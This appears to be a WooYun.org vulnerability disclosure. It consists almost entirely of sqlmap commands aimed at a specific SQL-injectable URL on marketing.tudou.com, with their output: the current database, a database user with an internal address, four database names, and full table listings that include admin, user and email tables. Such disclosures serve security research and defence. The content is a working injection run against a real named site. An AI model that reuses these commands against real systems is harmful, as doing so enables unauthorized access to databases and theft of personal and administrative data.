WooYun.org

python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --current-db
current database:    'marketing_db'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --users
database management system users [1]:
[*] 'mktapp'@'10.25.10.10_'
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --dbs
available databases [4]:
[*] information_schema
[*] marketing_db
[*] test
[*] wahaha
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "marketing_db"
Database: marketing_db
[55 tables]
+-----------------------+
| adm_access            |
| adm_func              |
| adm_user              |
| admin_info            |
| hack                  |
| ipdate                |
| log_video_player      |
| mkt_behavior          |
| mkt_comment           |
| mkt_configure         |
| mkt_counter           |
| mkt_creation          |
| mkt_creation2         |
| mkt_creation4         |
| mkt_creation_bankcomm |
| mkt_crontab           |
| mkt_event             |
| mkt_event_demo        |
| mkt_media_etl         |
| mkt_misc              |
| mkt_partner           |
| mkt_scenario          |
| mkt_scenario_stat     |
| mkt_scene             |
| mkt_score             |
| mkt_stock             |
| mkt_tree              |
| mkt_unit              |
| mkt_upload            |
| mkt_view              |
| mkt_visitor           |
| mkt_visitor_extend    |
| msg_hits              |
| msg_records           |
| msg_users             |
| skip                  |
| tb_jscm_rank          |
| tb_jscm_recod         |
| tb_list               |
| tb_manager            |
| tb_mc_blog            |
| tb_shcm_candidate     |
| tb_shcm_wlan          |
| tb_vote_limit         |
| teaser_emails         |
| tt_admin              |
| tt_event              |
| tt_page               |
| tt_rank               |
| tt_ria                |
| tt_video              |
| unt_levis_num         |
| user_list             |
| user_lucky            |
| userinfo              |
+-----------------------+
python sqlmap.py -u "http://marketing.tudou.com/toysrus/toysruschina/list.php?j=129138534" --tables -D "wahaha"
Database: wahaha
[44 tables]
+------------+
| test       |
| whha_1     |
| whha_10    |
| whha_2     |
| whha_3     |
| whha_4     |
| whha_5     |
| whha_6     |
| whha_7     |
| whha_8     |
| whha_9     |
| whha_ah    |
| whha_award |
| whha_bj    |
| whha_cq    |
| whha_f     |
| whha_fj    |
| whha_gd    |
| whha_gq    |
| whha_gx    |
| whha_gz    |
| whha_hb    |
| whha_hlj   |
| whha_hn    |
| whha_hub   |
| whha_hun   |
| whha_hz    |
| whha_jl    |
| whha_js    |
| whha_jx    |
| whha_ln    |
| whha_nmg   |
| whha_nx    |
| whha_sax   |
| whha_sc    |
| whha_sd    |
| whha_sh    |
| whha_shx   |
| whha_sx    |
| whha_t     |
| whha_tj    |
| whha_xj    |
| whha_yn    |
| whha_zj    |
+------------+